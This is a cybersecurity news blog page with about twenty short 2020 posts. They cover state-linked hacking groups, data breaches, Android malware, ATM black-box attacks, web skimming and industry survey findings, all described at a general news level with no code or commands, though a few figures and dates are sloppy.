Search This Blog

Showing posts with label Cybersecurity. Show all posts

Five Steps That Will Boost Your Cybersecurity And Assure Business Community In Real Life

 

The concept of business and marketing has seen a tremendous change for a few years. Business continuity meant protecting your company in times of crisis. However, it is about recovering from large scale cyberattacks as quickly as possible in the present times. These threats can include malware, phishing emails, DDoS attacks, ransomware, etc.


 
In recent times, there has been a rapid change in the field of cybersecurity too. It has now become a vital part of an organization's business continuity, in protecting employee data, intellectual property, operational plans, R&D, etc. Due to this, a question arises of 'how corporate and IT experts can work hand in hand' to protect an organization and promote its business. 

To achieve these goals, a simple five steps method, if followed, can ensure your organization's cybersecurity and prevent it from threats and cyberattacks. 

1. Prioritize: Threat intelligence should be acquired, and it should be prioritized to formulate a defense plan. Keep in mind that simulation attacks won't be much helpful as real-time attacks. Simulated attacks won't tell you the real strengths and weaknesses. This information helps experts identify the threats they must be more careful about and build a counter-testing testing plan. 

2. Measure: You should examine whether the measures you are taking to protect your business is helpful. If not, your preventive actions are ineffective. The plan should include analyzing threat adversaries and technical attacks, and how your people respond to it. 

3. Optimize: This step involves analyzing the gaps or barriers that you identified in the measuring stage. An effective business means overcoming these gaps and barriers. When the controls are optimized, the testing can then provide more measurable results that will make your security more robust. 

4. Rationalize: Is your investment in security measures proving beneficial or just a waste of money. With the help of testing data acquired after optimizing controls, the experts now know where to cut costs and invest more. It allows a business to save money while keeping the risk factor under control. 

5. Monitor: The final and most crucial step involves keeping a constant eye on changing the IT environment trends. There might come new challenges that your company might have to face; therefore, there should be a continuous evaluation of potential threats that might impact your business.

Hackers Attack Gaming Industry, Sell Player Accounts on Darkweb


Generating a tremendous revenue of $120.1 billion in 2019, the gaming industry is one of the largest and fastest-growing sectors. But this success comes at a high cost as it attracts hackers as a potential target. However, cyber-attacks in the video game industry are hard to trace, making the sector vulnerable to cybercriminals in recent times.



About the attacks
As per recent research, there exist covert markets that trade stolen gaming accounts. These trades can generate an unbelievable amount of $1 billion annually with this business. The Fortnite and Minecraft together amount to 70% of what these underground markets make. According to reports, Roblox, Runescape, Fortnite, and Minecraft are responsible for generating $700 annually. Experts at Night Lion security say that hackers selling stolen Fortnite player accounts are making up to $1 million annually.

Recent developments 
Hackers are now operating as a hierarchical organization, appointing designations for different work. The structured enterprise has positions like developers, senior managers, project managers, sales, and public relations to sensationalize their services.

  • The actors are using open cloud services and digital platforms to conduct their business. 
  • The hackers steal in-game inventories like skins, crates, and coupons from player accounts and sell them on the black market for a lower price. 
  • These hackers often target top gaming accounts and steal player profiles to trade them for lower prices in the underground market. 

Recent attacks 

  • Last month, experts found a game named "Fall Guys: Ultimate Knockout," which contained malicious javascript API. It stole data from target players' discord and browser. 
  • In June 2020, around 1.3 million Stalker Online players' accounts were stolen and sold on the dark web later. 
  • In July 2020, a Nintendo leak revealed the game's details before they were officially launched in the market. 


The gaming industry now faces a bigger challenge to protect its community from the rising attacks. A proactive and multi-layered approach can help gamming companies protect their customers, along with products and services. However, gamers should be careful, too, avoiding re-use of the same password on other platforms.

Iranian Threat Actors Have Modified Their Strategies, Attacks Now More Effective


Since the dawn of the digital age, Iranian hackers have been infamous for their attacks on critical infrastructures, targeting governments, and hacking large corporate networks. The main motive behind these attacks is getting espionage intelligence, steal confidential information, ransomware attacks, and target massive data networks. Since 2019, the hackers have been using developed strategies that are more effective in causing damage to the targets, resulting in better monetary benefits, says the Bloomsbury news.


Attack details

  • Earlier this year in April, hacking group APT34 (otherwise knowns as OilRig) launched a modified version of the backdoor named 'RDAT.' The backdoor uses the C2 channel, which can hide commands and data under images via attachments. 
  • Earlier this year in May, APT34 also added a new tool to its hacking inventory, known as DNSExfiltrator. The tool has allowed hackers to become the first hacking group that uses the DoH (DNS-over-HTTPS) protocol in its attacks. 

Keeping view of these new modifications in the hacking realm, organizations should know that the criminals are evolving and modifying their methods over time. It suggests that hackers have become more powerful and possess a more significant threat to the cybersecurity world.

Other developments 

  • In August 2020, the FBI issued a security alert about the hacking group going by the name of 'Fox Kitten' attacking potentially weak F5 networks. The hacker's purpose was to attack private and public U.S. government organizations. 
  • In July 2020, making its comeback, threat actor Charming Kitten launched a cyberespionage campaign, using WhatsApp and LinkedIn to imitate Persian speaking journalists. The targets included the U.S. government, Israeli scholars belonging to Tel Aviv and Haifa universities. 
  • In June 2020, an amateur hacking group from Iran attacked Asian companies using 'Dharma' ransomware. 

According to intelligence reports, the hackers used widely available hacking tools to target companies in China, Russia, Japan, and India. From July 2020, threat actor Fox Kitten is also infamous for giving small corporate networks access on hacking forums. According to experts, it is just trying to generate revenue using other income channels, using systems that lack any intelligence value but provide Iran money.

A Brief Summary of The Potential Threats Revealed in Black Hat 2020 Conference


Cybersecurity experts had a lot to say about possible cybersecurity threats in the USA Black Hat Conference.




Main Highlights

US Presidential Elections
As the US awaits its presidential elections, cybersecurity has become a significant issue. In the conference, experts came out with various solutions to election-related cybersecurity threats that might arise during the campaigning and offered new ideas to strengthen the infrastructure.

Exploits and Vulnerabilities 
Cybersecurity expert Matt Vixey presented research on cybersecurity exploits. The main idea is that cyberattacks can only be prevented if there's a proper system involved; in other words, a plan-of-action. Here, the 'Human factor' risk is involved, and the hackers attack it.

DNS Attacks 
In recent times, DNS encryptions and its security have come into question. Hackers have come with a new way to breach the encryption; the technique is known as DOH (DNS-over-HTTPS). The key speaker for the topic was Mr. Eldridge Alexander, Cisco's Duo Labs, Security Research, and Development manager.

Cyberthreats and COVID-19 
The COVID-19 pandemic saw a surge in cybersecurity threats. With people working from home, hackers saw new targets that were easy to attack. Keeping this particular issue in mind, Shyam Sundar Ramaswami presented several ways to identify pandemic based malware or malspam, including a rapid statics analysis approach.

A world without passwords 
Imagine a world with no passwords, a world where all the systems are integrated with a unique authorization model. Wolfgang Goerlich and Chris Demundo presented their 'Zero Trust' theory, where systems would not need to require passwords, making a secure cyber world.

Possible Threats

  • Influence Campaigns- Misuse of social media platforms to disseminate fake news and misinformation has become a critical problem, especially during the election campaigns. 
  • According to James Pevur, satellite communications are open to surveillance and monitoring. Hackers can easily bug communication using a few sophisticated gadgets. 
  • Botnets- Hackers can use high watt devices and turn them into Botnets, attacking energy campaigns. 
  • Experts say that open source tools can be used by hackers to create fake websites or channels that look the same as the original. It can allow the influence of public opinion.

APT36: A Pakistani Hacking Group, Strengthens Its Operations and Finds New Targets


Famous as APT36, Transparent Tribe is a hacking group that works from Pakistan. APT36 is infamous for monitoring and spying over government activities and military operations in Afghanistan and India. As per the latest reports, APT36 has now strengthened its workforce with better tools and strategies

About the incident 

APT36 usually focuses on using the same TTP (tactics, techniques, and procedures) except in a few cases where it uses different strategies for unique programs.


Some key highlights-

  • According to the reports, APT36 has sharpened its tools and activities. It involves attacking campaigns on a much larger scale and specifically targeting Afghanistan. 
  • Usually, APT36 uses 'custom.net' malware, commonly known as 'crimson rat.' APT36 has been using other malware recently, including python-based 'Peppy rat.' 
  • In the period between June2019-June2020, 200 samples were collected, which showed the Transparent Tribe Commission's components. 

Mode of operation 

  • APT36 uses spear-phishing emails containing MS-Office files, which are encoded with the malware. After successful execution, the malware can steal sensitive information, private credentials, capture screenshots, steal logs and keys, and regulate the microphone and webcam. 
  • Besides this, APT36 also uses the USBworm. It is a multipurpose malware that can steal information and function as a worm to attack any network and exploit vulnerabilities. 


APT36 attacks


  • APT36 attacked Indian railways in June and stole important information 
  • Earlier this year, APT36 deployed spear-phishing emails, posing to work as an authentic communication of government of India 
  • Cybersecurity experts have observed that APT36's primary targets include military and diplomacy from the past one year. According to them, the attacks will not decrease in the foreseeable future; on the other hand, they expect it to rise. 

According to Kaspersky's report, "we found two different server versions, the one being a version that we named "A," compiled in 2017, 2018, and 2019, and including a feature for installing the USBWorm component and executing commands on remote machines. The version that we named "B" was compiled in 2018 and again at the end of 2019. The existence of two versions confirms that this software is still under development, and the APT group is working to enhance it."

FBI Arrests Russian Hacker, Who Tried To Convince An Employee to Hack His Nevada Company


A hacker from Russia went to America and asked an employee of a Nevada company to install a malware in their company network. 

In a recent incident, the U.S Department of Justice declared charges against a Russian hacker today. The Russian national had traveled all the way to America to ask an American employee if he could set up malware, offering him $1,000,000 for the job. As per the court's reports today, the culprit, a 27-year-old hacker from Russia, named Egor Igorevich Kriuchkov, is found as a criminal member of an infamous Russian hacking group. The purpose of the attack was to gain internal access to the company's network and hack confidential information, later to be used as extortion for ransom purposes.


According to the company employee, Igor told him that to prevent the company from knowing about the primary attack, his team of hackers would launch DDoS attacks as a decoy to distract the corporate."The purpose of the conspiracy was to recruit an employee of a company to surreptitiously transmit malware provided by the coconspirators into the company's computer system, exfiltrate data from the company's network, and threaten to disclose the data online unless the company paid the coconspirators' ransom demand," says the court document.

However, Igor's heist plan failed when the employee who was contacted reported this incident to the FBI. The FBI kept a watch on Igor for the first few days, observing his every move. When it finally had all the evidence for the prosecution, the FBI arrested Igor last Saturday.

Timeline of Igor's visit to his arrest- 
  • Igor contacts employee CHSI (identified by the court) via WhatsApp and briefs him about the attack. Both used to be friends two years ago. 
  • Igor arrives in the U.S, meets with CHSI at a bar. 
  • On Igor's last day of the trip, he gives CHS1 all the details about the 'special project.' 
  • In the later events, the FBI contacts Igor, who tries to flee the country at that moment and is finally arrested.

Facebook Struggles Against Hate Speech and Misinformation, Fails to Take Actions


In the last month, FB CEO Mark Zuckerberg and others met with civil rights activists to discuss FB's way of dealing with the rising hate speeches on the platform. The activists were not too happy about Facebook's failure to deal with hate speeches and misinformation. As it seems, the civil rights group took an 'advertising boycott' action against the social media giant and expressed their stark criticism. According to these civil groups, they have had enough with Mark Zuckerberg's incompetency to deal with white supremacy, propaganda, and voters suppression on FB.


This move to boycott Facebook came as a response to Donald Trump's recent statement on FB. Trump said that anti-racism protesters should be treated with physical violence, and he also spread misinformation about mail-in voting. FB, however, denies these allegations, saying these posts didn't violate community policies. Even after such incidents, the company ensures that everything's alright, and it just needs to toughen up its enforcement actions.

"Facebook stands firmly against hate. Being a platform where everyone can make their voice heard is core to our mission, but that doesn't mean it's acceptable for people to spread hate. It's not. We have clear policies against hatred – and we constantly strive to get better and faster at enforcing them. We have made real progress over the years, but this work is never finished, and we know what a big responsibility Facebook has to get better at finding and removing hateful content." "Later this morning, Mark and I, alongside our team, are meeting with the organizers of the Stop Hate for Profit campaign followed by a meeting with other civil rights leaders who have worked closely with us on our efforts to address civil rights," said COO Sheryl Sandberg in her FB post.

In another incident, FB refused to take action against T. Raja Singh, an Indian politician from BJP. According to the Wall Street Journal, the company didn't apply its hate speech policies on Raja's Islamophobic remarks. FB employees admitted that the politicians' statements were enough to terminate his FB account. The company refused to, as according to the FB executive in India, could hurt FB's business in India.

Russian Hackers Use Linux Malware Drovorub, NSA and FBI Finds Out


The NSA and FBI released a joint report today, which told about a new kind of Linux malware. According to these two intelligence agencies, state-sponsored military Russian hackers are using this new malware. These hackers used Drovorub to plant backdoors inside breached networks. Fancy Bear and Sednit (APT28) are behind these attacks. The NSA and FBI have notified major private and public companies to stay aware of the malware and implement protective measures to keep safe. The malware comes with an implant and is a multi-component system. It comes with a file transfer kit, a C2 server, a kernel module tool, and a port-forwarding module.


The malware is a kind of Swiss army knife. Using Drovorub, hackers can do many things like controlling the target's systems and stealing data and personal files. Besides this, Drovorub is designed to work in stealth mode. It uses rootkit technologies to stay undetected. It allows hackers to deploy malware at different places and systems, which allows attack at any given instant. Regarding the cyberattacks issue, the US has always been a primary target for cybercriminals due to its sophisticated technology environment.

There's no substantial evidence as to the motive behind this attack. However, experts believe that the purpose might be espionage or tampering the upcoming presidential elections. The joint report of FBI and NSA says, "The Russian General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (GTsSS), military unit 26165, is deploying previously undisclosed malware for Linux® systems, called Drovorub, as part of its cyberespionage operations. GTsSS malicious cyber activity has formerly been attributed by the private sector using the names Fancy Bear, APT28, Strontium, and various other identifiers."

To stay safe, the agency has recommended US companies updating Linux systems to the latest update kernel version 3.7. "To prevent an order from being susceptible to Drovorub's hiding and persistence, system administrators should upgrade to Linux Kernel 3.7 or later to take full advantage of kernel signing enforcement. Additionally, system owners are advised to configure systems to load only modules with a valid digital signature making it more difficult for an actor to introduce a malicious kernel module into the system," says the US intelligence agencies' report.

Online Exam Tool ProctorU Breached, Half A Million User Accounts Leaked Online


Around half a million online users were affected due to the breach of online examination software called "ProctorU," a platform widely used in teaching institutes. The hackers, belonging to Shiny Hunters Group, recently posted the leaked data on the web, which contained details of 444,267 users, confirm the cybersecurity experts. ProctorU is a tool that provides institutions automatic monitoring options while conducting the examination. ProctorU, an American firm, built the application.


The data leaked belong to different individuals and organizations, including various education institutes, companies, and users of the breached software. The data leak is part of a bigger scheme of the Shiny Hunters Group, say some sources. They have posted other leaks in the recent weel. More than 386 Million users' data was published online in the past week by hackers. The companies affected include- Couchsurfing, WattPad, Minted, Bhinneka, Dunzo, Dave.com, and many others. The data leaked online include sensitive user information like which include usernames, passwords, full names of the individuals, contact no, and residential address.

Various universities worldwide have been affected by this breach, as they relied on ProctorU for conducting online examinations, keeping the social distancing in mind due to the coronavirus. Sydney University had done the same and used ProctorU to conduct its semester examinations. The University released a statement related to the breach expressing concern for the event. But the University of Sydney has come under a lot of criticism from the users as well as experts. According to them, ProctorU violates the student privacy policy, as given in the University.

Students have complained that the techniques ProctorU uses to keep a watch can be very intrusive and personal. During the examination, the tool asked students to show their surroundings, and also had control over the user's computer. It could be possible that ProctorU could send these data to third parties. "We consistently warned the University that this could happen. We demand the University immediately suspend the use of ProctorU, as that is the only way to guarantee that students are not exposed again in the future," said the Student Council of the University.

Florida Teen Responsible for Hijacking High Profile Twitter Accounts Arrested, Faces 30 Felony Charges


US police authorities in a press conference on Friday said they had arrested the main accused and two other suspects responsible for a major Twitter hack earlier this month. The main accused is recognized as Graham Ivan Clark, 17 years teen who lives in Tampa, Florida. WFLA-TV, a Florida-based news agency that reported the incident for the first time, said that it was the main suspect (Clark), who was arrested for the Twitter attack. The arrest happened through a national collaboration IRS, Secret Service, the FBI, and the DOJ.


Andrew Warren, State Attorney of Hillsborough, charged Clark responsible for the 15th July Twitter incident. Clark was alleged for being the "mastermind" behind the attack in which the 'suspects hijacked various high profile Twitter accounts.' The hackers used these accounts to tweet about fake cryptocurrency scams. Here's a list of hijacked accounts: Joe Biden, Barrack Obama, Bill Gates, Kanye West, Elon Musk, Apple, Jeff Bezos, Uber, Michael Bloomberg, Kim Kardashian, and various others. According to officials, the hack resulted in getting $1,00,000 worth amount transferred to Clark's account within a day.

Clark now faces 30 felony charges. These include: 

  • Communications Fraud 
  • Organizing Fraud 
  • Use of personal information for frauds 
  • Accessing electronic device without legal authority


The charges specified above were declared through Livestream by the Hillsborough State Attorney. In the beginning, Warren didn't specify whether Clark had other associates working for him. After the press conference, it came to public notice that two other suspects were working with Clark, identified as Mason Sheppard, 19, alias name "Chaewon," and Nima Fazeli, 22, alias name "Rolex." The suspect's arrest happened just after Twitter had published its inquiry report related to th 15th July Twitter hack.

Some of the critical points in the report are mentioned below:

  • The incident happened on 20th July 2020 
  • To gain access to Twitter employees' accounts, hackers used phone bases social engineering systems. Hackers got access to the slack accounts and gained credentials (Yet to be confirmed) 
  • Hackers escaped the 2 step authentication; the report doesn't mention whether backend accounts or slack accounts. 
  • After this, hackers used Twitter's tech support tools to control the accounts. 
  • Hackers breached 130 accounts 
  • Hackers also attempted to sell some of the high profile Twitter profiles.

Telegram Takes Down Islamist Propaganda on its Platform, Extremist Groups Struggle


The social networks and US military have imposed high regulations to control Islamist propaganda on social media and have been able to take down Islamic State terrorist groups. After this move, experts say these groups are now struggling to recover their control on the mainstream social media apps and networks. As most of the major social networking sites have choked the group, the Islamist group has tried to build its propaganda on small sites. But even there, it has met by strong regulations by the authorities. According to Europol, an EU (European Union) law agency, the social networking companies have tried to bring down these Islamist propaganda content growing on their websites, in an attempt to take down the extremist group activities on social media.


Europol, in its report, said, "While Google and Instagram deployed resilience mechanisms across their services, Telegram was the online service provider receiving most of the referral requests during this Action Day. As a result, a significant portion of key actors within the IS network on Telegram were pushed away." These extremist groups used Telegram as their primary platform of propaganda until 2019.

According to Europol, Telegram had removed up to 5000 terrorist profiles and bots in two days, in an effort against shutting down the Islamist propaganda. Earlier, it was only able to take down 200-300 accounts on average. After that incident, the extremist groups moved towards more covert apps like the Russian "TamTam" and "Hoop Messenger." Canada hosts these websites. The IS, in apparent desperation, has also started using chat services designed for blockchain developers to spread their messages. In 2016-17, the US cyber command took action against these extremist groups. It shut down recruitment groups and suppressed their further attempts to spread the messages.

Currently, the US cyber command has presidential approval to combat IS propaganda with cyberattacks. They have also widened their jurisdiction area since then. "In the past year and a half, Telegram has also put forth a considerable effort to root out the abusers of the platform by bolstering its technical capacity in countering malicious content and establishing a close partnership with Europol," says Europol.

Gothic Panda and Stone Panda: Chinese Hackers that Launched Mass Cyber Attacks on Indian Companies


Two Hacking groups from China named Gothic Panda and Stone Panda have been identified for organizing the majority of the cyber attacks on Indian companies in June 2020. Mumbai Mirror reported was the first to know about the incident. On 20th June, it published a report on its website regarding the issue. As per the cybersecurity experts, the word is that both the hacking groups are likely to work independently and not state-sponsored; however, they work in the interests of the Chinese government. According to experts, an anonymous source said that the attacks were launched under the disguise of VPN and Proxy Servers. After investigation, the attacks led us to Gothic Panda and State Panda, say the officials.

Chinese hackers launched more than 40,000 attacks. The hackers had used some unique malware to gain confidential data of the companies and later used the information for extortion. According to the reports, the hackers broke into at least six private/public companies' safety procedures. These include a government-regulated organization in Jammu and Kashmir and companies operating in New Delhi and Mumbai. The attacks were traced back to Souther Western Chinese province named Sichuan. These players also attempted to take down websites linked to companies that were involved in banking and finance.

The hackers used DDoS attacks (Distributed Denial of Service) and Internet Protocol Hijack. Experts say that these attacks, also called 'Probes,' look for vulnerabilities in a website's security features. In an incident where the hackers were able to crash the website, the home page was modified, and the content was changed with a foreign language. Experts say that there were no other successful probes except this incident.

In a DDoS attack, the hacker tries to rupture a cyber network, such as a website. For example, if a website page's utility provider's limit is 5000 requests/second, the hackers will pile it up with 5,00,000 requests/second and crash the website. Whereas in an Internet Protocol Hijack, the hacker tries to divert the course of traffic. In this case, the internet traffic was diverted through China for surveillance purposes.

Hackers Breached into Twilio's AWS; Company Confirms the Attack


In a recent cybersecurity breach incident, Twilio acknowledges that hackers breached into the company's cloud services (unsecured) and compromised its javascript SDK. The hackers modified the javascript that the company shares with the clients. Twilio, a famous cloud communications company, told a news agency about the incident, after an anonymous whistleblower had reported the issue to the agency. To summarise it all, a cybercriminal breached into Twilio's AWS (Amazon Web Services) S3 systems. It should be noted that the networks were unsecured and world-writable. The hacker modified the TaskRouter v1.20 SDK and attached some malicious codes designed to tell if the changes worked or not.


In response to the incident, Twilio says that the customer's privacy safety is the first and foremost concern for the company. Twilio confirms about the malware in the TaskRouter v1.20 SDK, and that it was the work of a 3rd party. The modification of the S3 bucket made the attack possible. According to Twilio, it immediately closed the S3 bucket after knowing the issue and has issued an inquiry into the incident. The company took roundabout 12 hours to deal with the issue. Currently, it has no proof if any of the customer accounts were stolen or not. However, it confirms that the hacker didn't break into the company's internal systems to modify coding or data.

 Twilio uses JavaScript SDK as a method to connect your business operations to its task router platforms. The company plans to publish a detailed report about the incident in a few days. However, a friendly suggestion to the users, if you have downloaded or installed an SDK copy, make sure that you have a legit copy.

 "Our investigation of the javascript that was added by the attacker leads us to believe that this attack was opportunistic because of the S3 bucket's misconfiguration. We believe that the attack was designed to serve malicious advertising to users on mobile devices," said Twilio to The Register as a response to the incident. It also says, "If you downloaded a copy of v1.20 of the TaskRouter JS SDK between July 19th, 2020 1:12 PM and July 20th, 10:30 PM PDT (UTC-07:00), you should re-download the SDK immediately and replace the old version with the one we currently serve."

Importance of Cybersecurity in the Healthcare Sector


Hackers and cybercriminals have targeted the healthcare sector for a long time. Among the healthcare industry, hospitals are generally the primary target for hackers, as they generate a lot of money. The hospitals hold very sensitive information of the patients, including credentials and personal data, and the hackers can take advantage of that. Due to the coronavirus pandemic, hospitals have received a large number of funds from the government and other agencies to deal with the issue, and the hackers are after the money.


The critical issue is that healthcare IT systems store patient credentials, including banking details, ID, and credit card details. Besides this, information such as patient's HIV details can be exposed, and cybercriminals can exploit for extortion. On the dark web, ID credentials can be sold for very profitable money, so the government and healthcare industry should take extra precautions to stay safe from cyber attacks. In the present pandemic crisis, blackmail has become one of the most common cyberattacks threats. Blackmail is different from ransomware; in the latter, the player holds company data as ransom by encrypting malware. Whereas, while blackmailing, the hacker threatens to expose critical data, unless his demands are met, which is mostly money.

In this scenario, the hospitals don't have any option but to compensate the cybercriminal as revealing patient information is not only dangerous but also against the doctor-patient confidentiality. In the starting phase of the COVID-19 outbreak, hackers across the world didn't target the healthcare industry. It created a false sense of security among the government and experts that the healthcare sector was safe from hackers and cyber attacks. It was all but long when the hackers finally decided to take a toll on cyberattacks on healthcare.

Therefore, the healthcare industry should step-up and create a robust cybersecurity infrastructure that ensures patients' privacy and security. General awareness of cybersecurity among citizens is also essential, especially sensitizing the hospital staff. Most important and the last one, healthcare institutes should team up with cybersecurity agencies that provide protection and security from cyber attacks and hackers.

Black Box: A New ATM Attack that Diebold Nixdorf Warns Off


A unique kind of ATM attack has come to surface called "Black Box." ATM developer Nixdorf warns the financial sector to stay on alert. The attack was widespread accross Europe recently. The Black Box ATM attacks are similar to Jackpotting, in which hackers make the ATMs dispense out cash in piles. Hackers use jackpotting to attach a malware in the ATM or use a black box instead. "Some of the successful attacks show a new adapted Modus Operandi on how the attack is performed.
"Although the fraudster is still connecting an external device, at this stage of our investigations, it appears that this device also contains parts of the software stack of the attacked ATM," says Diebold.


In the case of black-box attacks, the hacker tampers with the ATM's external casing and gets access to the port. The hacker can also put a hole in the machine to find internal wires and connectors. Once the hacker has access, he connects the black-box with the ATM through a laptop, building a connection with the internal systems. After this, the hacker then has control over the command options and uses it to dispense cash out of the ATM.

These kinds of jackpotting attacks on ATMs have happened for a decade. The jackpotting attacks have been quite famous among gangs, as the method is very cost-effective and profitable. Jackpotting attacks are more straightforward compared to cloning cards, ATM skimming, and laundering money, which consumes quite a lot of time. Another reason for the popularity of black-box attacks is that the noob hackers (amateur) don't have to spend a lot of money to get a black box. One can purchase a device and launch an ATM attack without having to spare a lot of time.

"In recent incidents, attackers focus on outdoor systems and are destroying parts of the fascia to gain physical access to the head compartment. Next, the USB cable between the CMD-V4 dispenser and the special electronics, or the cable between special electronics and the ATM PC, was unplugged. This cable is connected to the black box of the attacker to send illegitimate dispense commands," says Diebold on his website.

Welcome Chat App Harvesting User Data and Storing it in Unsecure Location


A messaging platform for Android, Welcome Chat spies upon its users and stores their data in an unsafe location that is accessible to the public. The authors of the app claim it to be available on the Google Play store, meanwhile, marketing it to be a secure platform for exchanging messages which however is not true by any means.

The website of the malicious 'Welcome Chat' app publicizes the platform as a secure communication Android solution, however, security researchers from ESET discovered the app being associated to a malicious operation having links to a Windows Trojan called 'BadPatch' which was employed by Gaza Hackers in a malicious campaign – a long-running cyber espionage campaign in the Middle-East. While the origins of the website advertising the app are unknown, the domain was registered by the developers in October 2019. Interestingly, the app doesn't only function as spyware but works perfectly as a chatting platform as well.

After downloading the app, users need to give permission for allowing installation from unknown sources as the app was not installed via the official app store. Once the Welcome Chat is activated, it asks permission to access the user's contacts, files, SMS, location details, and record audio. Although the list of permissions gets pretty exhaustive for a user to not doubt it, then again they are used to it, especially in case of a messaging platform.

As soon as the app receives all the permissions, it starts mining the victim's data which includes phone recordings, location details, SMS messages and sends it to the cybercriminals behind the malicious operation.

While giving insights about the app, Lukáš Štefanko, researcher at ESET, told, “In addition to Welcome Chat being an espionage tool, its operators left the data harvested from their victims freely available on the internet. And the app was never available on the official Android app store.”

“We did our best to discover a clean version of this app, to make its developer aware of the vulnerability. But our best guess is that no such app exists. Naturally, we made no effort to reach out to the malicious actors behind the espionage operation,” added Štefanko.

Hackers Attack Online Stores Stealing Credit Card Data, Experts Allege North Korea


According to the recent findings, there has been an incident of web skimming attacks on the European and American online store websites. The hackers responsible for the attacks are likely to be state-sponsored from North Korea. Research conducted by cybersecurity experts at Sansec reveals that the web skimming attacks that broke into the online retail stores started in May 2019. APT Lazarus and Hidden Cobra hacking groups were responsible for the attacks, planting payment skimmers to breach the security.



According to the new research, the hackers have now increased their activities. They have now set a larger target area and attack online stores using a skimming script, which steals the customer's banking credentials during the checkout stage. The researchers from Sansec claim that the attacks were carried out by Hidden Cobra because a similar hacking pattern was used in their previous attacks.

What is Magecart Attack? 
It is a web skimming attack in which hackers can steal banking credentials from the user and credit card details. However, in this incident, Hidden Cobra, after gaining access, launched a large scale attack on big online retail stores. Once hackers have unauthorized access, they deploy fake scripts on the websites' checkout pages. The skimmer then stores all the credentials that the user types during the checkout stage and sends it to the main Hidden Cobra servers. According to Sances data, in millions of online stores, up to 100 stores' websites are compromised on an average every day.

"To monetize the skimming operations, HIDDEN COBRA developed a global exfiltration network. This network utilizes legitimate sites that were hijacked and repurposed to serve as disguises for criminal activity. The system is also used to funnel the stolen assets so that they can be sold on dark web markets. Sansec has identified a number of these exfiltration nodes, including a modeling agency8 from Milan, a vintage music store9 from Tehran, and a family-run book store10 from New Jersey," says the Sansec report. Experts have now linked various attacks since 2019 to Hidden Cobra, say that the threat actors are very likely to be state-sponsored.

Android Malware, FakeSpy Spying on Users' Banking Information Acting as Postal Services


A new Android malware, FakeSpy that can potentially steal an individual's banking details, read contact lists, application, and account information along with other personal data, is seen to be spreading across the globe. Earlier, the Android malware was targeting limited regions; the new campaign propagating the malware spreads itself using SMS phishing attacks.

The Android malware was originally discovered in 2017 while it was attacking users in Japan and South Korea, however, now security researchers have identified more potent variants of the malware attacking users in various countries like United States, Germany, France, Taiwan, United Kingdom, and China to name a few.

FakeSpy, labeled as 'the information stealer', is evolving rapidly, undergoing active development that can be seen in the weekly release of new variants of malware with different levels of potential and evasion capabilities.

"The malware authors seem to be putting a lot of effort into improving this malware, bundling it with numerous new upgrades that make it more sophisticated, evasive, and well-equipped. These improvements render FakeSpy one of the most powerful information stealers on the market. We anticipate this malware to continue to evolve with additional new features; the only question now is when we will
see the next wave," Security researchers at Cybereason told.

The tailored attacks are being found to be linked with a financially motivated Korean-or Chinese-speaking cybercriminal group known as 'Roaming Mantis' that had been involved in other similar operations, according to the research carried out by researchers at Cybereason.

FakeSpy is operating with the agenda of making financial gains through stolen credentials and banking information of users, the campaign includes sending postal-themed messages to the targeted user's contacts.

While giving insights into the attack, Assaf Dahan, senior director and head of threat research at Cybereason told ZDNet, "We are under the impression that this attack is what we often refer to as "spray and pray." I don't believe they are aimed at a particular individual, but instead, the threat actors try their luck, casting a rather wide net, and waiting for someone to take a bite."

"We see new developments and features added to the code all the time, so my guess is that business is good for them," he further added.

Google Playstore Removes 25 Android Apps that Stole User Login Credentials


In a recent cybersecurity incident, Google cleared 25 applications from its google play store as they were alleged to steal the users' FB credentials. According to Google, these applications were downloaded for around 2..35 million before the play store decided to shut them down. All these 25 applications were created by the same developer, even though they seemed to work differently and offer different features, they were all peas in a pod.


These apps showed themselves as a video editor, photo editor, wallpaper apps, file managing apps, mobile gaming apps, and flashlight apps., says Evina, a France based cybersecurity organization. When the firm came to know about the incident, it reported to Google, and precautionary measures were taken immediately to protect the end-users. The malware was also reverse-engineered so that no damage could take place. The 25 apps had malware embedded in them, which stole FB login credentials whenever the user launched the FB application.

Although the apps worked legally, they, however, had hidden malicious codes. The code could tell about the recently launched app in the user's device. If it were FB, these apps would create a fake login page that looked the same as the original to steal the user's login credentials. If the user entered his login credentials, the app would capture the data and transfer it to a remote server domain. When Google came to know about the issue after Evina's claims in May, it verified it before taking down these apps. Playstore removed these 25 apps earlier this month, some of which had been in use for more than a year.

"When an application is launched on your phone, the malware queries the application name. If it is a Facebook application, the malware will launch a browser that loads Facebook at the same time. The browser is displayed in the foreground, which makes you think that the application launched it. When you enter your credentials into this browser, the malware executes javascript to retrieve them. The malware then sends your account information to a server," said Evina in a blog post.

Cyberattacks in the U.S. Hit an All-Time High due to Covid-19, Says Black Hat Report.


Due to the coronavirus pandemic, cybersecurity experts suspect a rise in cyberattacks and cybercrimes, says a survey by Black Hat earlier this week. Around 275 cybersecurity professionals (respondents in the study) have expressed concerns about potential breaches in the U.S. infrastructure and the I.T. industry. More than 90% of these experts believe that due to coronavirus, there has been a jump in cyber threats in the U.S., resulting in data leaks and privacy breaches. Around 24% of experts believe that the current danger is very severe and critical.


Among the cybersecurity threats, work from vulnerabilities in the remote access systems tops the list, accounting for 57% of the attacks. Meanwhile, phishing scams and spam attacks account for a hefty 51%. Around 85% of these experts claim that there might be a targeted cyberattack on the U.S. infrastructure in the next two years. The threat figures went up from 69% in 2018 to 77% in 2019. Among these, around 15% of the respondents believe that the government and the private sector is ready to face these attacks. These percentage figures went down from about 20% in 2019.

The majority of the cybersecurity experts believe that their firms would have to take care of the upcoming cybersecurity challenges. More than half of these believe that they currently lack the required staff force to combat cyber threats. Besides this, the budget required to protect their organization's data from cyberattacks is also low. Besides the concerns about the lack of resources to defend against cybercriminals, experts also say that they lack proper technology. According to the survey results, only half of the technology tools could be termed effective.

"The survey results suggest that the world's top cybersecurity professionals are more concerned than ever about cybersecurity risk at the global, national, enterprise, and consumer levels. While cyber threats have been growing in volume and sophistication in recent years, most security professionals believe that the radical shift toward remote access creates unprecedented risk for sensitive data," says the 2020 Black Hat USA report.